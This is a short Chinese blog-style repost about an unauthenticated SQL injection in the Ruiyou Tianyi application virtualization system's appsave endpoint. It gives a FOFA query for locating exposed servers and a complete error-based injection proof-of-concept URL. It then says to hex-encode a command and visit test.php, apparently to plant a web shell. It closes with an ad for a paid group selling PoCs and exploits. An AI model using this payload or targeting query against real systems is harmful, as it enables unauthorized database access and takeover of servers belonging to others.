本文主要是介绍瑞友天翼应用虚拟化系统appsave SQL注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
网络测绘
fofa:title=="瑞友应用虚拟化系统"
漏洞描述
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。
瑞友天翼应用虚拟化系统中的/Home/Controller/AdminController 存在 appsave接口无需鉴权并且存在SQL注入。
影响版本
version<=7.0.5.1
漏洞复现
使用burp suite抓包构造POC
/index.php?s=/Admin/appsave&appid=3')+AND+(SELECT+2590+FROM(SELECT+COUNT(*),CONCAT(0x716a766a71,(SELECT+(ELT(2590=2590,1))),0x7162786271,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)--+ITBH
将命令进行hex编码执行
访问test.php
加入我们的星球,我们能提供:
1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。
这篇关于瑞友天翼应用虚拟化系统appsave SQL注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
